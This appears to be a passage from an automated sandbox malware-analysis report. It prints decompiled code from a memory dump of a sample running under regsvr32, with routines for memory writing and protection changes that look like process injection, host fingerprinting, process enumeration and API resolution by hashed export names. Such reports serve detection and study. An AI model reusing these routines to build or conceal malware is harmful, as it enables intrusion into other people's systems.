									goto L6;
								}
							}
						}
					}
				}
				E042AD38B();
				return _t66;
			}



















                                                                                                                                                                                              0x042ad965
                                                                                                                                                                                              0x042ad967
                                                                                                                                                                                              0x042ad969
                                                                                                                                                                                              0x042ad972
                                                                                                                                                                                              0x042ad97d
                                                                                                                                                                                              0x042ad982
                                                                                                                                                                                              0x042ad986
                                                                                                                                                                                              0x042ad99a
                                                                                                                                                                                              0x042ad9a2
                                                                                                                                                                                              0x042ad9c3
                                                                                                                                                                                              0x042ad9c9
                                                                                                                                                                                              0x042ad9d1
                                                                                                                                                                                              0x042ad9df
                                                                                                                                                                                              0x042ad9e5
                                                                                                                                                                                              0x042ad9e6
                                                                                                                                                                                              0x042ad9f2
                                                                                                                                                                                              0x042ad9f9
                                                                                                                                                                                              0x042ada09
                                                                                                                                                                                              0x042ada49
                                                                                                                                                                                              0x042ada49
                                                                                                                                                                                              0x042ada28
                                                                                                                                                                                              0x042ada28
                                                                                                                                                                                              0x042ada47
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ada47
                                                                                                                                                                                              0x042ada09
                                                                                                                                                                                              0x042ad9c3
                                                                                                                                                                                              0x042ad986
                                                                                                                                                                                              0x042ada4b
                                                                                                                                                                                              0x042ada56

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042AD218: LoadLibraryW.KERNEL32 ref: 042AD312
                                                                                                                                                                                                • Part of subcall function 042AD447: NtCreateSection.NTDLL(042AD982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 042AD4B9
                                                                                                                                                                                                • Part of subcall function 042AD447: RegisterClassExA.USER32(?), ref: 042AD50D
                                                                                                                                                                                                • Part of subcall function 042AD447: CreateWindowExA.USER32 ref: 042AD538
                                                                                                                                                                                                • Part of subcall function 042AD447: DestroyWindow.USER32(00000000), ref: 042AD543
                                                                                                                                                                                                • Part of subcall function 042AD447: UnregisterClassA.USER32 ref: 042AD54E
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 042AD9BB
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 042ADA04
                                                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 042ADA21
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 042ADA42
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1578692462-0
                                                                                                                                                                                              • Opcode ID: bb89a34f1ff9af312bbd816621c6c60cebc267023b74b4a8921a8b7dc147e8a6
                                                                                                                                                                                              • Instruction ID: eab870003aefcbe096c2a26280ba740c0498c280c0339285c321221771deb251
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb89a34f1ff9af312bbd816621c6c60cebc267023b74b4a8921a8b7dc147e8a6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A312BB2B1010AAFDB11DFA8DD88FDEBBB9EF48314F1041A5E904E2251D730EB558B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042ADF3D Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E042ADF3D(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x42bf830; // 0x42a0000
				_t68 = E042A8BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x42bf818; // 0x48ef8b0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E042B3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x42bf818; // 0x48ef8b0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E042A95F3(_t194, _t207);
					}
					_t75 =  *0x42bf818; // 0x48ef8b0
					_t77 = E042AC879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E042AC9F4( *_t77) == 0) {
						_t79 = E042AC8C9(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E042AF3A3(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E042AF368(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x42bf820; // 0x48efaa0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E042ADF36(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E042A95F3(_t149, _t211);
					}
					_t92 = E042AC6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E042AC4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E042A99DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E042A960D(_t149, _t36);
					_t97 = E042AE2C5(_t196, E042AA43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E042AC6E4(_t97, _t37, _t216);
					_t99 =  *0x42bf818; // 0x48ef8b0
					_t101 = E042ACA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E042A8D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E042ADD39(_t100);
					_t106 = E042ADD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E042A9DF2(_t105, 0x9cf);
					_t177 =  *0x42bf818; // 0x48ef8b0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x42bf818; // 0x48ef8b0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E042A8BAF( &_v8);
					_t113 =  *0x42bf818; // 0x48ef8b0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E042A9E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x42bf818; // 0x48ef8b0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x42bf818; // 0x48ef8b0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x42bf818; // 0x48ef8b0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x42bf818; // 0x48ef8b0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x42bf818; // 0x48ef8b0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x42bf818; // 0x48ef8b0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E042B3548(E042AE2C5(_t62, E042AA43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E042B351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E042A96DA(_t66, _t191);
					_t134 = E042ADAE3(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































                                                                                                                                                                                              0x042adf3d
                                                                                                                                                                                              0x042adf47
                                                                                                                                                                                              0x042adf53
                                                                                                                                                                                              0x042adf58
                                                                                                                                                                                              0x042adf5d
                                                                                                                                                                                              0x042adf6a
                                                                                                                                                                                              0x042adf70
                                                                                                                                                                                              0x042adf75
                                                                                                                                                                                              0x042adf7b
                                                                                                                                                                                              0x042adf8b
                                                                                                                                                                                              0x042adf90
                                                                                                                                                                                              0x042adf95
                                                                                                                                                                                              0x042adf95
                                                                                                                                                                                              0x042adfa5
                                                                                                                                                                                              0x042adfab
                                                                                                                                                                                              0x042adfad
                                                                                                                                                                                              0x042adfb6
                                                                                                                                                                                              0x042adfb6
                                                                                                                                                                                              0x042adfbc
                                                                                                                                                                                              0x042adfc9
                                                                                                                                                                                              0x042adfce
                                                                                                                                                                                              0x042adfd4
                                                                                                                                                                                              0x042adfdd
                                                                                                                                                                                              0x042adfeb
                                                                                                                                                                                              0x042adff2
                                                                                                                                                                                              0x042adff7
                                                                                                                                                                                              0x042adff7
                                                                                                                                                                                              0x042adff8
                                                                                                                                                                                              0x042adfdf
                                                                                                                                                                                              0x042adfdf
                                                                                                                                                                                              0x042adfdf
                                                                                                                                                                                              0x042adffe
                                                                                                                                                                                              0x042ae004
                                                                                                                                                                                              0x042ae009
                                                                                                                                                                                              0x042ae00f
                                                                                                                                                                                              0x042ae014
                                                                                                                                                                                              0x042ae01a
                                                                                                                                                                                              0x042ae01a
                                                                                                                                                                                              0x042ae023
                                                                                                                                                                                              0x042ae029
                                                                                                                                                                                              0x042ae02d
                                                                                                                                                                                              0x042ae034
                                                                                                                                                                                              0x042ae03b
                                                                                                                                                                                              0x042ae042
                                                                                                                                                                                              0x042ae046
                                                                                                                                                                                              0x042ae04d
                                                                                                                                                                                              0x042ae04e
                                                                                                                                                                                              0x042ae050
                                                                                                                                                                                              0x042ae055
                                                                                                                                                                                              0x042ae05c
                                                                                                                                                                                              0x042ae05e
                                                                                                                                                                                              0x042ae05e
                                                                                                                                                                                              0x042ae06e
                                                                                                                                                                                              0x042ae073
                                                                                                                                                                                              0x042ae073
                                                                                                                                                                                              0x042ae080
                                                                                                                                                                                              0x042ae086
                                                                                                                                                                                              0x042ae08b
                                                                                                                                                                                              0x042ae08d
                                                                                                                                                                                              0x042ae096
                                                                                                                                                                                              0x042ae096
                                                                                                                                                                                              0x042ae09e
                                                                                                                                                                                              0x042ae0a3
                                                                                                                                                                                              0x042ae0a3
                                                                                                                                                                                              0x042ae0a9
                                                                                                                                                                                              0x042ae0b4
                                                                                                                                                                                              0x042ae0b9
                                                                                                                                                                                              0x042ae0c1
                                                                                                                                                                                              0x042ae0c7
                                                                                                                                                                                              0x042ae0cf
                                                                                                                                                                                              0x042ae0e1
                                                                                                                                                                                              0x042ae0e7
                                                                                                                                                                                              0x042ae0ef
                                                                                                                                                                                              0x042ae0f4
                                                                                                                                                                                              0x042ae101
                                                                                                                                                                                              0x042ae112
                                                                                                                                                                                              0x042ae118
                                                                                                                                                                                              0x042ae11d
                                                                                                                                                                                              0x042ae120
                                                                                                                                                                                              0x042ae123
                                                                                                                                                                                              0x042ae130
                                                                                                                                                                                              0x042ae136
                                                                                                                                                                                              0x042ae140
                                                                                                                                                                                              0x042ae140
                                                                                                                                                                                              0x042ae146
                                                                                                                                                                                              0x042ae14e
                                                                                                                                                                                              0x042ae159
                                                                                                                                                                                              0x042ae15e
                                                                                                                                                                                              0x042ae164
                                                                                                                                                                                              0x042ae166
                                                                                                                                                                                              0x042ae173
                                                                                                                                                                                              0x042ae174
                                                                                                                                                                                              0x042ae175
                                                                                                                                                                                              0x042ae180
                                                                                                                                                                                              0x042ae182
                                                                                                                                                                                              0x042ae189
                                                                                                                                                                                              0x042ae189
                                                                                                                                                                                              0x042ae193
                                                                                                                                                                                              0x042ae198
                                                                                                                                                                                              0x042ae19d
                                                                                                                                                                                              0x042ae19d
                                                                                                                                                                                              0x042ae1a3
                                                                                                                                                                                              0x042ae1aa
                                                                                                                                                                                              0x042ae1ab
                                                                                                                                                                                              0x042ae1b8
                                                                                                                                                                                              0x042ae1cb
                                                                                                                                                                                              0x042ae1d0
                                                                                                                                                                                              0x042ae1d5
                                                                                                                                                                                              0x042ae1de
                                                                                                                                                                                              0x042ae1de
                                                                                                                                                                                              0x042ae1e4
                                                                                                                                                                                              0x042ae1e9
                                                                                                                                                                                              0x042ae1ef
                                                                                                                                                                                              0x042ae1f5
                                                                                                                                                                                              0x042ae1fa
                                                                                                                                                                                              0x042ae203
                                                                                                                                                                                              0x042ae205
                                                                                                                                                                                              0x042ae20c
                                                                                                                                                                                              0x042ae20c
                                                                                                                                                                                              0x042ae212
                                                                                                                                                                                              0x042ae21a
                                                                                                                                                                                              0x042ae21f
                                                                                                                                                                                              0x042ae220
                                                                                                                                                                                              0x042ae225
                                                                                                                                                                                              0x042ae22e
                                                                                                                                                                                              0x042ae230
                                                                                                                                                                                              0x042ae23b
                                                                                                                                                                                              0x042ae23b
                                                                                                                                                                                              0x042ae244
                                                                                                                                                                                              0x042ae24c
                                                                                                                                                                                              0x042ae253
                                                                                                                                                                                              0x042ae258
                                                                                                                                                                                              0x042ae267
                                                                                                                                                                                              0x042ae27f
                                                                                                                                                                                              0x042ae286
                                                                                                                                                                                              0x042ae294
                                                                                                                                                                                              0x042ae29f
                                                                                                                                                                                              0x042ae2a0
                                                                                                                                                                                              0x042ae2a4
                                                                                                                                                                                              0x042ae2aa
                                                                                                                                                                                              0x042ae2ab
                                                                                                                                                                                              0x042ae2b3
                                                                                                                                                                                              0x042ae2b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042ae2c0
                                                                                                                                                                                              0x042ae2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,042A959D,00000100,?,042A6507), ref: 042A8BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 042ADF64
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 042AE05E
                                                                                                                                                                                              • GetSystemMetrics.USER32(00001000), ref: 042AE06E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 042AE123
                                                                                                                                                                                                • Part of subcall function 042AC8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,042A0000), ref: 042AC96D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 042AE14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 3131805607-2706916422
                                                                                                                                                                                              • Opcode ID: fcd6a09800ded9ab94078dfdb3487f42d885d0e0328a33c2a22ee9deb537bcb8
                                                                                                                                                                                              • Instruction ID: 1a05c43ab6378ff9c1f3b65bc1ab04890b2c62b0807a7f1e7a3d25432d7676ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: fcd6a09800ded9ab94078dfdb3487f42d885d0e0328a33c2a22ee9deb537bcb8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 95918C71710605AFE704EF75E849FEAB7A8FF08304F014169E959D7240DB74BAA58BE0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AC5EC Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E042AC5EC(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E042A8D6D(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x42bf818; // 0x48ef8b0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E042A9DF2(_t44, 0xad6);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E042A8BAF( &_v16);
				_t33 = E042AA456(_t43);
				E042A9E51( &(_t43[E042AA456(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E042AA456(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E042AE2C5(_t43, E042AA456(_t43) + _t40, 0);
			}
















                                                                                                                                                                                              0x042ac5ec
                                                                                                                                                                                              0x042ac5f5
                                                                                                                                                                                              0x042ac601
                                                                                                                                                                                              0x042ac607
                                                                                                                                                                                              0x042ac609
                                                                                                                                                                                              0x042ac611
                                                                                                                                                                                              0x042ac61f
                                                                                                                                                                                              0x042ac624
                                                                                                                                                                                              0x042ac633
                                                                                                                                                                                              0x042ac63e
                                                                                                                                                                                              0x042ac64b
                                                                                                                                                                                              0x042ac665
                                                                                                                                                                                              0x042ac66a
                                                                                                                                                                                              0x042ac66c
                                                                                                                                                                                              0x042ac673
                                                                                                                                                                                              0x042ac683
                                                                                                                                                                                              0x042ac694
                                                                                                                                                                                              0x042ac69e
                                                                                                                                                                                              0x042ac6a6
                                                                                                                                                                                              0x042ac6ad
                                                                                                                                                                                              0x042ac6b0
                                                                                                                                                                                              0x042ac6cd

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000100), ref: 042AC633
                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 042AC665
                                                                                                                                                                                                • Part of subcall function 042A9E51: _vsnwprintf.MSVCRT ref: 042A9E6E
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000114), ref: 042AC69E
                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 042AC6B0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 455400327-0
                                                                                                                                                                                              • Opcode ID: 7d56ce8f781556269f2ecbe13f34fe2e1e4025666a3d8f071777577e600bfdec
                                                                                                                                                                                              • Instruction ID: 2c589f7de755806451cc971345b69cc28bf2e3f51cfdb2887e9cd71f65fea77e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d56ce8f781556269f2ecbe13f34fe2e1e4025666a3d8f071777577e600bfdec
                                                                                                                                                                                              • Instruction Fuzzy Hash: FC2132B2B10218BFE710ABA4EC89FEEB7BCDF44314F104565F905D2181EA74AE54CAA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AB96A Relevance: 6.1, APIs: 4, Instructions: 66processCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                              			E042AB96A(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E042A8D6D( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x42bf818; // 0x48ef8b0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}












                                                                                                                                                                                              0x042ab982
                                                                                                                                                                                              0x042ab984
                                                                                                                                                                                              0x042ab988
                                                                                                                                                                                              0x042ab98b
                                                                                                                                                                                              0x042ab98d
                                                                                                                                                                                              0x042ab992
                                                                                                                                                                                              0x042ab9a1
                                                                                                                                                                                              0x042ab9a9
                                                                                                                                                                                              0x042ab9bd
                                                                                                                                                                                              0x042ab9cd
                                                                                                                                                                                              0x042ab9d7
                                                                                                                                                                                              0x042ab9db
                                                                                                                                                                                              0x042ab9f8
                                                                                                                                                                                              0x042ab9ff
                                                                                                                                                                                              0x042ab9bf
                                                                                                                                                                                              0x042ab9bf
                                                                                                                                                                                              0x042ab9c5
                                                                                                                                                                                              0x042ab9ca
                                                                                                                                                                                              0x042ab9ca
                                                                                                                                                                                              0x042ab9bd
                                                                                                                                                                                              0x042aba08

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 042AB988
                                                                                                                                                                                                • Part of subcall function 042A8D6D: memset.MSVCRT ref: 042A8D7F
                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 042AB9B8
                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 042AB9EB
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 042AB9F8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2518216231-0
                                                                                                                                                                                              • Opcode ID: 8fc6fbedf28ba5b912ca11f314a2719fb32c7728ee3f8f3d93defd349cef7d9b
                                                                                                                                                                                              • Instruction ID: 4ace7aab7f94a25a6d16caff51e89d54956854c46f1bac69a00c2dd571b949a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fc6fbedf28ba5b912ca11f314a2719fb32c7728ee3f8f3d93defd349cef7d9b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 391181723143025BC310DA68BC49E9A7BE8EF89360F150A29FA65C7180EB24E955C7A5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042AEEBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 259 42aeebb-42aeed2 260 42aef2f 259->260 261 42aeed4-42aeefc 259->261 263 42aef31-42aef35 260->263 261->260 262 42aeefe-42aef21 call 42aa43d call 42ae2c5 261->262 268 42aef23-42aef2d 262->268 269 42aef36-42aef4d 262->269 268->260 268->262 270 42aef4f-42aef57 269->270 271 42aefa3-42aefa5 269->271 270->271 272 42aef59 270->272 271->263 273 42aef5b-42aef61 272->273 274 42aef63-42aef65 273->274 275 42aef71-42aef82 273->275 274->275 276 42aef67-42aef6f 274->276 277 42aef87-42aef93 LoadLibraryA 275->277 278 42aef84-42aef85 275->278 276->273 276->275 277->260 279 42aef95-42aef9f GetProcAddress 277->279 278->277 279->260 280 42aefa1 279->280 280->263
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AEEBB(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E042AE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E042AA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
